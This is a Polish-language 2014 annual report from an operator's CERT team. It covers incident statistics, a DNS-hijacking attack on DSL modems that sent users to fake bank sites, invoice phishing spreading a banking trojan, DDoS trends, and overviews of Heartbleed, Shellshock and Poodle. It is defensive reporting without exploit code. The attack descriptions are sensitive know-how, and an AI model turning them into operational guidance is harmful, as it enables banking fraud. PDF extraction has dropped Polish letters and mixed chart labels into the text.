Raport CERT Orange Polska

Raport
CERT Orange Polska

za rok 2014
Raport CERT Orange Polska za rok 2014
Spis treci
Raport powsta we wsppracy z Integrated Solutions,

dostawc nowoczesnych rozwiza ze wiata
informatyki i telekomunikacji.
1. Dlaczego powsta raport CERT Orange Polska?
2. Podsumowanie informacji zawartych wraporcie
3. CERT Orange Polska kim jestemy?
4. Najgroniejsze podatnoci 2014 roku na wiecie
11
4.1
11
Okiem partnera McAfee
5. Najwaniejsze zagroenia roku 2014 wsieci Orange Polska
13
5.1
Case study atak na modemy DSL (luty 2014)
15
5.2
Case study faszywe faktury, ataki phishingowe (2. poowa roku)
17
6. Ataki DDoS
19
6.1
Ryzyka zwizane zatakami DDoS
19
6.2
Statystyki
19
Okiem partnera Radware
23
6.3
7. Malware
25
7.1
Malware na platformy stacjonarne
27
7.2
Malware na platformy mobilne
30
7.3
Okiem partnera FireEye
31
8. Skanowania portw ipodatnoci
33
8.1
Skanowania portw
33
Podatnoci
35
8.2
9. Cyberwiat 2015 oczami partnerw Orange Polska
40
10. Komercyjne usugi bezpieczestwa Orange Polska
44
11. Zaczniki
46
11.1
Zacznik 1. Analiza malware WinSpy (na komputery stacjonarne)
47
11.2
Zacznik 2. Analiza malware Emotet (na komputery stacjonarne)
55
11.3
Zacznik 3. Analiza malware NotCompatible.C (na urzdzenia mobilne zsystemem Android)
59
11.4
Zacznik 4. Analiza podatnoci Heartbleed
64
11.5
Zacznik 5. Analiza podatnoci Shellshock
66
11.6
Zacznik 6. Analiza podatnoci Poodle
71
11.7
Zacznik 7. Inne interesujce podatnoci
75
1. Dlaczego powsta raport

CERT Orange Polska?
Ponad 2 miliony klientw stacjonarnych usug szerokopasmowego dostpu do internetu, przeszo 100 tysicy alertw DDoS,
kilkanacie tysicy incydentw bezpieczestwa w cigu roku, niezliczone iloci przejtego i przeanalizowanego zoliwego
oprogramowania, 18 lat dowiadczenia w dziedzinie bezpieczestwa IT. Dla Orange Polska bezpieczestwo teleinformatyczne to istotny element funkcjonowania firmy, std cigy rozwj tej dziedziny. Efektem jest m.in. certyfikacja CERT dla zespou
reagowania na zagroenia bezpieczestwa teleinformatycznego.
Dla Orange Polska

bezpieczestwo
teleinformatyczne
to istotny element
funkcjonowania firmy...
Sie Orange Polska obejmuje swoim zasigiem okoo 40% polskiego internetu1, dlatego liczba zdarze i incydentw obsugiwanych przez CERT Orange Polska pozwala na obserwacj trendw oraz wyciganie wnioskw, ktre mona przeoy
na cay krajowy internet. Jako jeden z gwnych operatorw telekomunikacyjnych Orange Polska, dziki dziaalnoci swojej
jednostki CERT, dysponuje baz informacji i zdarze, ktre podlegaj cigej analizie, nierzadko wpywajc na biece funkcjonowanie firmy. Zdecydowalimy si zatem podzieli tymi informacjami po to, by pokaza spojrzenie na bezpieczestwo
teleinformatyczne oczami operatora.
Niniejsze opracowanie to pierwsze podsumowanie caorocznych dziaa CERT Orange Polska. Dzisiaj nie mona bagatelizowa cyber-zagroe istotna cz biznesu i interakcji z aktualnymi lub potencjalnymi klientami dzieje si w sieci, wic
si rzeczy tam przenosi si take przestpczo. Gboko wierz, e Raport CERT Orange Polska pomoe menederom
w zrozumieniu zagroe funkcjonujcych w internecie, jak rwnie w podejmowaniu decyzji biznesowych i inwestycyjnych.
Przydatny bdzie take dla wszystkich zainteresowanych internautw.
Piotr Muszyski
Wiceprezes Zarzdu ds. Operacyjnych
Orange Polska
http://www.orange-ir.pl/pl/results-centre/results/2014.
2. Podsumowanie informacji
zawartych wraporcie
Systemy ochrony przed

atakami DDoS wsieci Orange
Polska zidentyfikoway
wminionym roku ponad
100 tysicy ostrzee oruchu
noszcym znamiona ataku
W 2014 roku CERT Orange Polska obsugiwa ok. 1000

incydentw bezpieczestwa miesicznie 39 procent stanowiy zgoszenia iobserwacje zwizane zrozpowszechnianiem niechcianej korespondencji (spamu). Najwikszym
incydentem by lutowy atak na modemy DSL polskich
internautw, ktry swoim zasigiem obj 100 tysicy
podatnych urzdze, zczego ok. 50 tysicy zostao skutecznie zrekonfigurowanych przez atakujcych akcje
podejmowane przez CERT Orange Polska zostay opisane szerzej wraporcie jako studium przypadku cyberataku
iprzeciwdziaania mu.
Systemy ochrony przed atakami DDoS wsieci Orange Polska zidentyfikoway w minionym roku ponad 100 tysicy
ostrzee oruchu noszcym znamiona ataku to wzrost
oblisko 40 procent wporwnaniu z2013 rokiem. CERT
Orange Polska zanotowa znaczny wzrost liczby atakw
wykorzystujcych niepoprawnie skonfigurowane serwery
(m.in. synchronizacji czasu), pozwalajce na skierowanie
w stron ofiary odpowiedzi wikszej nawet kilkaset razy
od pakietu inicjujcego atak. rednie szczytowe natenie
ataku odnotowane przez CERT Orange Polska to ok. 900
Mbps. Najwikszy wolumen zaobserwowanego w sieci
Orange Polska ataku to 93 Gbps (gigabitw na sekund)
oraz 50 Mpps (milionw pakietw na sekund). Od kilku
lat utrzymuje si tendencja do dywersyfikacji celw atakw
zjednoczesnym skracaniem czasu ich trwania.
Analiza stwierdzonych w sieci przypadkw zoliwego
oprogramowania wykazaa, e du popularnoci ciesz
si tzw. bankery zoliwe oprogramowanie wykradajce
dane logowania do systemw e-bankowoci oraz malware ukierunkowany na ataki APT (Advanced Persistent
Threat), szerzej opisany przez jednego zpartnerw niniejszego raportu. Ciekawsze przypadki malware eksperci
CERT Orange Polska poddali dokadnej analizie, ktra
zosta przedstawiona w zacznikach zamieszczonych
wkocowej czci raportu.
Najczciej atakowane przez cyberprzestpcw usugi to

serwery WWW oraz web proxy (port 8080), oprogramowanie umoliwiajce zdalny dostp do komputera (Virtual
Network Computing, port 5900) oraz poczenia do baz
danych opartych na SQL (MS SQL Server, port 1433).
Warto pamita, by na bieco aktualizowa zabezpieczenia aplikacji czcych si zsieci internet oraz blokowa dostp do nieuywanych portw. Najpopularniejsza
podatno stwierdzona przez CERT Orange Polska (21
procent przypadkw) to Directory Listing, pozwalajca
atakujcemu na podejrzenie zawartoci katalogw na serwerze wtym m.in. pliku /etc/passwd/.
Najgroniejsze ubiegoroczne podatnoci s dowodem na
to, e nawet popularne, dojrzae oprogramowanie moe
zawiera nieodkryte, krytyczne luki bezpieczestwa. Regularne aktualizowanie oprogramowania i instalowanie at
bezpieczestwa to wci absolutny obowizek. Dodatkowo, co jest bardzo wane zwaszcza wduych organizacjach, zalecane jest stosowanie strategii defense-in-depth
oraz ograniczanie powierzchni ataku poprzez wyczanie
zbdnych usug i programw. Wzrost liczby podatnoci
wsystemach Unix/Linux sugeruje znaczny wzrost zainteresowania cyberprzestpcw tymi systemami imoe oznacza wzrost liczby atakw w2015 roku.
Jeli chodzi otrendy na 2015 rok, wzwizku zdynamicznym rozrostem Internet of Things, CERT Orange Polska
oraz partnerzy raportu przewiduj wzrost liczby atakw
na nowe rodzaje urzdze korzystajcych z dostpu do
internetu. Ataki APT bd coraz bardziej wyrafinowane,
pojawi si wnich m.in. znane do tej pory zprodukcji hollywoodzkich mechanizmy samozniszczenia, co powanie
utrudni wykrywanie sprawcw. Jednego mona by pewnym bezpieczestwo teleinformatyczne w2015 roku na
pewno nie straci na znaczenia.
3. CERT Orange Polska kim jestemy?

Orange Polska (dawniej Telekomunikacja Polska S.A.)
przykada du wag do bezpieczestwa teleinformatycznego ju od 1997 roku, gdy w strukturze firmy powstaa
pierwsza odpowiedzialna wycznie za ten aspekt jednostka. W2006 roku jako trzecia jednostka wPolsce iobecnie jedyny operator telekomunikacyjny otrzymalimy
prawo do uywania nazwy CERT (Computer Emergency
Response Team). Jest ono przyznawane przez Carnegie
Mellon University (CERT.org) wycznie zespoom speniajcym wyrubowane wymagania dotyczce obsugi zagroe zwizanych zcyberbezpieczestwem i reagowania na
te zagroenia.
Nasi klienci niejednokrotnie

mogli ju si przekona,
e dbamy oich bezpieczestwo
okadej porze dnia inocy.
1997
2005
2006
Abuse TP SA
(Polpak)
Abuse TP SA
TP CERT
2010
TP SOC
SOC komercyjny
Operatorzy CERT Orange Polska (I linia wsparcia) pracuj

w trybie 7/24/365, monitorujc poziom bezpieczestwa
uytkownikw naszej sieci, przyjmujc zgoszenia, reagujc na zidentyfikowane incydenty bezpieczestwa i podejmujc dziaania zmierzajce do minimalizacji zagroe.
Zespoy analitykw oraz ekspertw (II i III linia wsparcia)
wspieraj codzienn prac linii operacyjnej w przypadku
wystpienia bardziej zoonych zdarze, nieujtych w procedurach reagowania na incydenty standardowe. S rwnie odpowiedzialne za przeprowadzanie analiz zagroe,
optymalizacj procesu obsugi standardowych incydentw
bezpieczestwa oraz rozwj narzdzi detekcji iminimalizacji
zagroe. Takie wielopoziomowe podejcie do organizacji
zespou reagowania pozwala na efektywne wykorzystanie
zasobw osobowych itechnologicznych przy jednoczesnej
optymalizacji kosztw funkcjonowania. Nasi klienci niejednokrotnie mogli si przekona, e dbamy oich bezpieczestwo okadej porze dnia inocy.
2013
W codziennej pracy CERT Orange Polska wsppracuje

na szczeblu operacyjnym zkrajowymi imidzynarodowymi
organizacjami skupiajcymi jednostki o podobnym profilu dziaalnoci. Jest jednym z dwch krajowych zespow
akredytowanych w ramach inicjatywy Trusted Introducer,
dziaajcej przy europejskiej organizacji TERENA TF-CSIRT
(zrzeszajcej ponad 200 jednostek CERT w Europie).
Uczestniczy rwnie w pracach najwikszej organizacji
zrzeszajcej wiatowe CERTy FIRST (Forum of Incident
Response and Security Teams).
Orange Polska jest strategicznym partnerem renomowanych dostawcw rozwiza bezpieczestwa, takich jak
McAfee, Cisco czy BlueCoat, tworzc z nimi rozwizania z zakresu cyberbezpieczestwa (m.in. zapewniajce
ochron przed atakami na infrastruktur wasn iklienck).
Od wielu lat wsppracujemy take z innymi wiodcymi
dostawcami rozwiza bezpieczestwa: HP, FireEye, EMC,
Check Point, Arbor Networks, Radware, czy Crossbeam.
Wramach usug komercyjnych Orange Polska, m.in. dziki
wykorzystaniu kompetencji CERT Orange Polska, wdroy
szereg projektw wPolsce iwEuropie, wtym: DDoS Protection, RiverBed MS (firma z brany ubezpieczeniowej),
SIEM (due instytucje bankowe, content service provider)
oraz przeprowadzia testy i audyty bezpieczestwa dla
klientw, rwnie zagranicznych, zwielu bran.
Na witrynie internetowej http://cert.orange.pl/ mona znale alerty bezpieczestwa oraz inne istotne informacje,
atake baz wiedzy iszereg poradnikw, za na witrynie
http://blog.orange.pl regularnie publikowane s informacje
dotyczce bezpieczestwa IT, gwnie budujce wiadomo bezpiecznych zachowa wsieci.
CERT OPL
SOC OPL
Raport przygotowany przez CERT Orange Polska

Adres do kontaktu wsprawie raportu: raportcertopl@orange.com
Kontakt zCERT Orange Polska
cert.orange.pl
cert.opl@orange.com
4. Najgroniejsze podatnoci 2014 roku

na wiecie
Analitycy McAfee zauwayli wminionym roku znaczne nasilenie zjawiska wykorzystywania popularnoci legalnych aplikacji w rozprzestrzenianiu mobilnego
zoliwego oprogramowania. Ciekawym przykadem takiej taktyki by klon popularnej gry mobilnej Flappy Birds. Wedug McAfee Labs a 79% klonw gry Flappy Birds (rwnie tych dostpnych wlegalnych sklepach zoprogramowaniem,
zanim zostay stamtd usunite) zawierao wirusy! Instalacja takiej aplikacji przez
uytkownika umoliwiaa cyberprzestpcom m.in. wykonywanie pocze telefonicznych bez wiedzy uytkownika, instalowanie dodatkowych aplikacji, uzyskanie dostpu do listy kontaktw, ledzenie pooenia telefonu inieograniczon
kontrol nad danymi wurzdzeniu, wtym nad zapisywaniem, wysyaniem iotrzymywaniem wiadomoci SMS.
Sebastian Zamora
Channel Account Manager McAfee
Raporty McAfee Labs wskazuj na kilka przykadw wykorzystania funkcji zaufanych aplikacji iusug przez mobilne zoliwe oprogramowanie, np.:
Android/BadInst.A:
Ta zoliwa aplikacja mobilna dziaa wobszarze uwierzytelnienia iautoryzacji
konta wApp Store wcelu automatycznego pobierania, instalowania iuruchamiania aplikacji bez zgody uytkownika.
Android/Waller.A:
Wykorzystuje luk wlegalnej usudze cyfrowego portfela wcelu przejcia kontroli nad protokoem przekazw pieninych iprzeniesienia rodkw na serwery
atakujcego.
Android/Balloonpopper.A:
Korzysta zluki wmetodzie szyfrowania popularnego komunikatora WhatsApp,
umoliwiajc atakujcemu przechwycenie i udostpnienie konwersacji i zdj
bez zgody uytkownika.
Mamy zaufanie do marek inazw, ktre znamy zinternetu. Kiedy bardzo chcemy co mie, czsto nasza czujno jest upiona ibezwiednie godzimy si na
czyhajce zagroenia mwi Vincent Weafer, Senior Vice President McAfee
Labs. Rok 2014 pokaza ju wsposb wyrany, e twrcy mobilnego zoliwego oprogramowania wykorzystuj t wanie skonno. Programici musz
koniecznie usprawni zabezpieczenia wbudowywane w tworzone przez nich
aplikacje, auytkownicy powinni zwiksz ostronoci podchodzi do udzielania zgody wramach ich uywania ostrzega Weafer.
W 2014 roku opublikowano informacj o wielu podatnociach. Na cz znich warto zwrci szczegln uwag
ze wzgldu na ich grony charakter.
Jedn z najczciej przytaczanych i najdokadniej opisywanych wminionym roku luk by Heartbleed podatno
odkryta w pakiecie OpenSSL pozwalajca na odczytanie
fragmentw pamici atakowanego procesu, a w konsekwencji czsto prywatnego klucza, co pozwala na odszyfrowanie treci przechwyconego komunikatu. Moe to
oznacza np. moliwo ledzenia irejestrowania interakcji
w programie pocztowym lub przechwycenia wpisywanego loginu ihasa (np. do banku). Biblioteki SSL, wktrych
wykryto podatno, byy niezwykle popularne w chwili
publikowania informacji luka dotyczya okoo p miliona
dziaajcych w sieci serwerw WWW. Luka bya rwnie
bardzo atwa do wykorzystania. W opracowaniu amerykaskiego repozytorium National Vulnerability Database
uzyskaa w tej kategorii ocen 10/10 w punktacji CVSS
(Common Vulnerability Scoring System Wsplny System
Oceniania Podatnoci).
Podatno Shellshock zostaa upubliczniona 24 wrzenia
2014 roku. Polega ona na tym, e program bash umoliwia atakujcemu wykorzystanie treci, ktra powinna by
interpretowana jako dane, w charakterze kodu wykonywalnego. W efekcie atakujcy moe za porednictwem
zmiennych rodowiskowych przekaza do programu polecenie, ktre ten nastpnie wykona. Shellshock jest jedn
z najbardziej niebezpiecznych luk zaobserwowanych od
lat, a to dlatego, e bash, jako ulubiona powoka wielu
administratorw systemowych, bardzo czsto jest wybierana jako domylna dla systemw klasy Linux czy Unix.
Oznacza to, e liczba podatnych systemw jest wysoka.

Dodatkowo, atak za porednictwem Shellshock jest atwy
do wykonania nawet automatycznie, ado jego przeprowadzenia nie potrzeba duej wiedzy.
Poodle to luka wSSL protokole zabezpieczania transmisji
sieciowych. Wpoczeniu zinnymi machinacjami atakujcy moe j wykorzysta, by uzyska moliwo odczytu
danych zabezpieczonych przez szyfrowanie tym protokoem. Podatno dotyczy wszystkich pakietw oprogramowania wspierajcego protok SSLv3.
Wniosek? Nawet rozprzestrzenione i wydawa by si
mogo dojrzae oprogramowanie moe zawiera nieodkryte krytyczne luki bezpieczestwa. Dlatego oprcz utrzymywania aktualnych wersji oprogramowania zalecane jest
stosowanie kilku warstw zabezpiecze (strategia defense-in-depth) oraz ograniczanie skutecznoci potencjalnego
ataku przez wyczanie zbdnych usug iprogramw.
Na przykadzie atakw opartych na luce Shellshock mona
zauway, e systemy Unix, Linux oraz inne wykorzystujce powok bash mog stanowi cele rwnie dla autorw
robakw, ktrzy do tej pory oszczdzali je ze wzgldu na
wiele rnic midzy poszczeglnymi dystrybucjami. Tymczasem z powodu charakteru luki rnice te okazay si
nieistotne, a systemy serwerowe stay si celem atakw
typowych dla jednorodnych systemw klienckich, takich
jak np. systemy rodziny Windows.
Zainteresowanych szersz analiz opisanych podatnoci
zapraszamy do lektury zacznikw od 4. do 7. umieszczonych na kocu raportu.
4.1 Okiem partnera McAfee
10
11
5. Najwaniejsze zagroenia 2014 roku

wsieci Orange Polska
Wykres 1.
Spam
39%
Rozkad procentowy typw

incydentw obsuonych
przez CERT Orange Polska
DDoS
W2014 roku zesp CERT Orange Polska obsuy 11 379

incydentw bezpieczestwa, w ktrych rdem bd
celem ataku bya sie usugowa Orange Polska. Informacje
o incydentach pochodziy zarwno ze rde zewntrznych, jak i alertyw z wewntrznych systemw bezpie-
28%
typ incydentu
czestwa.
Prby wama
Typy incydentw obsuonych przez zesp CERT Oran-
20%
ge Polska w2014 roku wrozkadzie procentowym przedMalware
stawiono na wykresie 1, poniej szczegowo opisano
7%
Phishing URL
poszczeglne kategorie. Kategorie oparte s na typie

i skutku dziaa naruszajcych bezpieczestwo, zwiza-
1%
nych zprocesem ataku na system teleinformatyczny ijego
Inne
5%
udzia procentowy
Wykres 2.
Liczba incydentw obsuonych
1400
przez CERT Orange Polska
1200
wskali miesica
800
600
400
grudzie
listopad
wrzesie
padziernik
miesic
sierpie
lipiec
czerwiec
maj
kwiecie
marzec
luty
200
stycze
liczba incydentw
1000
wykorzystaniem. >> Wykres 1.

Spam
wysyanie niechcianej poczty elektronicznej zurzdze
pracujcych wsieci Orange Polska lub do uytkownikw sieci Orange Polska
DDoS
rozproszone ataki blokujce usug, ktrych jednym ze
rde bd celem byo urzdzenie uytkownika sieci
Orange Polska
Prby wama
prby uzyskania nieautoryzowanego dostpu do systemu (np. zgadywanie hase), ktrych rdem lub
celem byo urzdzenie uytkownika sieci Orange Polska
Malware
rozpowszechnianie zoliwego oprogramowania (np.
umoliwienie hostowania zoliwej strony internetowej),
ktrych rdem byo urzdzenie uytkownika sieci
Orange Polska
Phishing URL
umoliwianie hostowania przez urzdzenia uytkownikw sieci Orange Polska faszywej strony, wyudzajcej
poufne informacje
Inne
m.in. przechwytywanie bd modyfikowanie informacji, rozpowszechnianie treci zabronionych prawem
(pornografia dziecica, handel narkotykami etc.) iniebezpiecznych (z wyczeniem spamu, umieszczonego w oddzielnej kategorii) oraz oszustw sieciowych
(zwyczeniem phishingu URL)
oniej liczba incydentw obsuonych przez CERT OranP
ge Polska wskali miesica. rednio wmiesicu obsugiwanych byo blisko 1 000 incydentw.
>> Wykres 2.
12
Mimo faktu, e zagroenia wynikajce ze spamu s znane

od wielu lat, a na rynku jest dostpnych sporo narzdzi
i usug umoliwiajcych jego minimalizacj, stanowi on
nadal znaczcy problem dla uytkownikw sieci internet. Z jednej strony do skrzynek poczty elektronicznej
trafia mnstwo niechcianej korespondencji, z drugiej za
cz korespondencji, ktrej uytkownik oczekuje, filtry
zabezpieczajce traktuj jako spam iprzenosz do folderw zniechcian poczt, co utrudnia ich skuteczne dotarcie do odbiorcy. Dodatkowo wykorzystywana przez atakujcych moliwo podszywania si pod adres nadawcy
korespondencji wysyanie bez jego wiedzy izgody wiadomoci e-mail ze zoliw zawartoci powoduj, e adres
zaatakowanego nadawcy moe trafi na oficjalne listy
spamerskie. Efektem jest blokada moliwoci wysyania
i otrzymywania korespondencji elektronicznej dla zaatakowanego adresu e-mail, a nierzadko rwnie dla caej
domeny.
Zgoszenia otrzymane przez CERT Orange Polska dotyczce kadego zrodzajw uciliwoci zwizanej ze spamem s podejmowane do analizy i realizacji przez operatorw zgodnie z obowizujcymi procedurami obsugi.
Dziki temu, e marka CERT Orange Polska jest rozpoznawana na rynku zarwno krajowym, jak izagranicznym,
zgoszenia przekazywane przez naszych operatorw m.in.
do jednostek odpowiedzialnych za aktualizacj tzw. black
list s przez te organizacje realizowane priorytetowo.
Wpodobny sposb wsppracuj zCERT Orange Polska
firmy wiadczce usugi hostingowe wprzypadku zgoszenia przez operatora CERT do firmy hostingowej informacji o wykryciu serwisu wysyajcego wiadomoci typu
spam serwis taki jest blokowany przez hostujcego.
Zuwagi na zwikszon dostpno rozwiza awostatnim czasie rwnie dedykowanych usug umoliwiajcych
przeprowadzanie atakw DDoS do operatorw CERT
coraz czciej trafiaj zgoszenia dotyczce tego zagroenia. T drog pozyskiwana jest niewielka cz informacji o atakach DDoS podstawowym rdem informacji
oatakach na klientw sieci Orange Polska s dedykowane
temu celowi systemy monitorowania umoliwiajce take
minimalizacj zagroenia. Celami atakw s nie tylko due
organizacje np. wiadczce usugi bankowoci elektronicznej, cho takie ataki najczciej s szeroko komentowane w rodkach masowego przekazu, gdy dotykaj
wjednym czasie wielu uytkownikw usug bankowych.
13
5.1 Case study atak na modemy DSL (luty 2014)

Ataki DDoS s dedykowane przede wszystkim na klientw
usug takich jak Neostrada czy Internet DSL. Ich wysoki
wolumen, nierzadko przekraczajcy 3 Gbps, bez podjcia mitygacji przez CERT Orange Polska niejednokrotnie
nie pozostawaby bez wpywu na dostpno usug dla
innych klientw podczonych do tych samych wzw
sieciowych co atakowany uytkownik. Dlaczego klienci
detaliczni padaj ofiarami atakw DDoS? Gwnie dlatego,
e korzystaj zmoliwoci prowadzenia gier on-line. Przeciwnik, chcc umierci gracza lub przej jego zasoby, zamawia na adres IP ofiary usug ataku DDoS, ktry
potrafi skutecznie ograniczy dostpno sieci internet dla
niego wtym czasie taki atak mona kupi ju za kilkanacie dolarw. Pozwala on wykona wwirtualnym wiecie
zamierzone przez atakujcego dziaania.
Zgoszenia ujte w kategorii Prby wama dotycz
gwnie dziaa zwizanych z podejrzeniem prb przeamania zabezpiecze w systemach dokonywanych przez
uytkownikw sieci Orange Polska. Wprzewaajcej czci odpowiedzialno za to jak iza dziaania dotyczce
wysyania spamu oraz uczestnictwo komputerw osobistych uytkownikw sieci watakach DDoS ponosi malware, ktrym zainfekowane s stacje robocze uytkownikw. Komputery takie bez wiedzy i zgody uytkownika
staj si narzdziami w rkach przestpcw. Za porednictwem tzw. serwerw C&C (Command and Control),
przejmuj oni dziki malware kontrol nad komputerem

ofiary iwydaj mu polecenia realizowania nieuprawnionych
dziaa.
Wkategorii Malware ujte zostay dziaania prowadzone
przez CERT Orange Polska dotyczce identyfikacji, analizy
oraz ograniczania rozprzestrzeniania si malware na stacje uytkownikw sieci Orange Polska, atake czynnoci
zwizane zograniczeniem moliwoci komunikacji zainfekowanych stacji zserwerami C&C.
Phishing, jeli patrzy si od strony ilociowej, powinien stanowi ladowe zagroenie, wci jednak zagraa uytkownikom sieci internet. Na skutek tego typu atakw poufne
dane uytkownikw mog si dosta wniepowoane rce,
aich wykorzystanie moe przysporzy wacicielowi wielu
kopotw, cznie z kradzie pienidzy zkont bankowych,
utrat dostpu do treci zamieszczonej w sieciach spoecznociowych lub w poczcie elektronicznej oraz kontroli nad tymi treciami. Przeciwdziaajc atakom, CERT
Orange Polska przede wszystkim uniemoliwia nawizanie poczenia przez uytkownikw sieci Orange Polska
zserwisami wyudzajcymi informacje. Dodatkowo CERT
Orange Polska wsppracuje z podmiotami hostujcymi
usugi serwisw webowych na jego wniosek serwisy
internetowe wyudzajce informacje s blokowane, stajc si niedostpnymi dla wszystkich uytkownikw sieci
internet, rwnie bdcych klientami innych operatorw
telekomunikacyjnych.
Wlutym 2014 roku nastpi zmasowany atak na modemy

uytkownikw szerokopasmowego dostpu do internetu
(m.in. firm TP-Link, Pentagram, D-Link), polegajcy na uzyskaniu dostpu do konfiguracji backupu ipodmianie DNS-w na takie, ktre przekierowuj ruch na faszywe strony
bankw. Urzdzenia pochodzce zsieci sprzeday Orange byy przed tego typu atakami zabezpieczone, ryzyko
dotyczyo urzdze kupionych na wolnym rynku, zktrych
korzysta wielu naszych klientw. W wyniku tych atakw
CERT Orange Polska podj natychmiastowe dziaania:
4 lutego 2014 roku w godzinach wieczornych CERT
Orange Polska w porozumieniu z zagroonymi instytucjami finansowymi oraz Zwizkiem Bankw Polskich zablokowa adresy DNS (fake DNS) kierujce
ruch uytkownikw na spreparowane faszywe strony
internetowe bankowoci elektronicznej. Wmomencie
blokowania adresw nie byo jeszcze moliwe oszacowanie skali zagroenia. Po zablokowaniu fake DNS
gwatownie wzrosa liczba pocze klientw zBiurem
Obsugi Klienta Orange Polska, zwizanych zreklamacj braku dostpnoci usug Neostrada oraz Internet
DSL, co znacznie wyduyo czas oczekiwania na poczenie zBiurem Obsugi Klienta bd nawet je wykluczao.
Zesp CERT Orange Polska po otrzymaniu powyszej
informacji przeprowadzi analiz sytuacji i ustali, e
w modemach kupionych przez klientw poza sieci
1
2
rne
inte
podstawione (faszywe)
serwery DNS
autentyczne serwisy WWW,
np. bankowo internetowa
Rysunek 1 poniej przedstawia proces ataku.
podatne modemy
uytkownikw/
klientw
sie
atakujcy
sprzeday Orange Polska, majcych luk bezpieczestwa, zostay podmienione adresy DNS. Zablokowanie
tych adresw pozwolio na zabezpieczenie klientw
przed dziaaniami atakujcych, jednak spowodowao jednoczenie uniemoliwienie korzystania z usug
dostpu do sieci internet.
5 lutego zesp CERT Orange Polska wypracowa
rozwizanie umoliwiajce zapewnienie bezpiecznego
dostpu do sieci internet dla klientw Orange Polska
zzainfekowanymi modemami. Wykonano tzw. sinkholing (przekierowanie ruchu na adresy IP serwerw DNS
Orange Polska zjednoczesn analiz zoliwego ruchu
przez CERT Orange Polska), co pozwolio klientom ze
zmienionymi adresami DNS odzyska dostp do sieci
internet. Zdecydowano te oprzeprowadzeniu etapami przekierowania zainfekowanych uytkownikw na
dedykowan stron WWW z ostrzeeniem o zagroeniu oraz narzdziem i instrukcj do wprowadzenia
poprawnych parametrw konfiguracyjnych w routerach, co pomogo w minimalizowaniu zagroenia.
Cho potencjalnie zagroone byy 94 tysice klientw Orange Polska (liczb zaatakowanych modemw oszacowano na 44 tysice), trzeba zaznaczy,
e atak prowadzony by rwnie na innych polskich
operatorw.
L
OP
podstawione serwisy WWW,

np. bankowo internetowa
Atakujcy pobieraj konfiguracj

z podatnego modemu.
Atakujcy ustawiaj adresy serwerw

DNS na faszywe.
Uytkownicy prbuj si dosta

do bankowoci intemetowej
ich komputery wysyaj zapytania
o adresy IP e-bankw do faszywych
serwerw DNS-w.
Faszywe DNS-y kieruj

uytkownikw do podstawionych
serwisw bankowoci internetowej.
Uytkownicy prbuj si
zalogowa na swoje konta
w serwisach bankowoci
internetowej, podaj atakujcym
swoje loginy, hasa oraz inne dane
potrzebne do uwierzytelnienia.
Atak moe by rwnie
wykorzystany do przejcia
komputerw uytkownikw
w celu stworzenia botnetu
do wykonywania np. atakw
DDoS lub spamowych.
Rysunek 1.
Proces atakw na modemy DSL
14
15
Wykres 3.
100 000
Liczba podatnych iprzejtych
90 000
modemw DSL wanalizowanym
80 000
okresie
70 000
liczba
60 000
50 000
40 000
30 000
20 000
Powysza liczba przejtych i podatnych modemw DSL

wanalizowanym okresie. Pod koniec lutego liczba przejtych ipodatnych modemw zostaa znaczco ograniczona, a do 26 marca 2014 roku podatno zostaa usunita
iprzestaa stanowi zagroenie wsieci Orange Polska.

>> Wykres 3.
Reakcja CERT Orange Polska pomoga w skutecznym
zabezpieczeniu klientw Orange Polska przed konsekwencjami ataku. Zablokowaa rwnie cyberprzestpcom szans przejmowania iinfekowania komputerw oraz
wykorzystania ich do stworzenia botnetu umoliwiajcego
przeprowadzenie na przykad:
atakw DDoS na dowolne usugi internetowe (np. usugi
bankowoci elektronicznej, witryny rzdowe, infrastruktur dowolnego operatora telekomunikacyjnego etc.),

atakw spamowych wysyka wiadomoci e-mail
zawierajcych reklamy, informacje wyudzajce dane
lub np. wysanie ogromnej liczby wiadomoci na jeden
adres e-mail, skutkujce jego niedostpnoci,
atakw phishingowych i pharmingowych (przekierowanie uytkownika na podstawion stron WWW
mimo wpisania prawidowego adresu) pozyskiwanie poufnych danych uytkownikw (loginy, hasa do
kont bankowych, kont e-mail, dostpu do portali) oraz
przejcie rodkw pieninych z kont bankowych
uytkownikw.
10 000
5.2 Case study faszywe faktury, ataki phishingowe (2. poowa roku)
podatne modemy
03/03
02/03
01/03
28/02
27/02
26/02
25/02
24/02
23/02
22/02
21/02
data
20/02
19/02
18/02
17/02
16/02
15/02
14/02
13/02
12/02
11/02
10/02
09/02
08/02
07/02
Od pocztku wakacji polscy internauci stali si obiektem

ataku phishingowego przeprowadzanego przy uyciu maili
z zacznikiem przypominajcym faktury za usugi telekomunikacyjne. Wysyane maile dotyczyy znacznej czci
operatorw telekomunikacyjnych (w tym Orange Polska).
Do CERT Orange Polska napyny wlipcu i w sierpniu zgoszenia klientw dotyczce faszywych maili tego typu.
CERT Orange Polska otrzyma informacje iprbki zoliwego oprogramowania zwielu rde, a nastpnie podda je
szczegowej analizie. Wkolejnych krokach:
zoliwy kod zosta zidentyfikowany jako odmiana trojana Tiny Banker (Tinba),
przejte modemy
uzyskano nazwy domen oraz adresy IP serwerw kontrolujcych botnet,

ruch zsieci Orange Polska do szkodliwych adresw po
ich zidentyfikowaniu zosta natychmiast zablokowany,
nawet wprzypadku infekcji zoliwe oprogramowanie
nie mogo si komunikowa z centrum zarzdzania
inie powodowao szkd uuytkownikw,
informacja na temat postpowania wprzypadku otrzymania tego typu korespondencji zostaa przekazana
do Biura Obsugi Klienta imediw,
opublikowano szereg informacji wserwisie
blog.orange.pl oraz cert.orange.pl.
Rysunek 2.
Mail phishingowy
16
17
6. Ataki DDoS
Wykres 4.
redni
niski
Liczba alertw DDoS wpodziale

na poziom krytycznoci
2014/12/01
2014/11/01
2014/10/01
2014/09/01
2014/08/01
2014/07/01
2014/06/01
2014/05/01
2014/04/01
2014/03/01
2014/02/01
800
700
600
500
400
300
200
100
0
2014/01/01
liczba alertw
wysoki
Wykres 5.
Poziom krytycznoci alertw DDoS
wrozkadzie procentowym
60%
poziom krytycznoci alertu
30%
redni
wysoki
10%
udzia procentowy
Nieprzygotowana, zaskoczona atakiem DDoS ofiara nie

ma w wikszoci przypadkw moliwoci obrony bd
te potencjalne rodki obrony s tylko pozorne (np. restart
aplikacji, serwerw, urzdze) inie prowadz do penego
przywrcenia usugi. Odcicia atakowanego serwisu od
sieci nie mona nazwa rodkiem zaradczym, skoro wanie to byo celem atakujcego.
Obserwowane wgrudniu (okres witeczny) ataki na serwisy potentatw rozrywki sieciowej (PSN i XBOX Live)
spowodoway straty finansowe liczone w milionach dolarw. Atakw DDoS bdcych wstanie zablokowa usugi
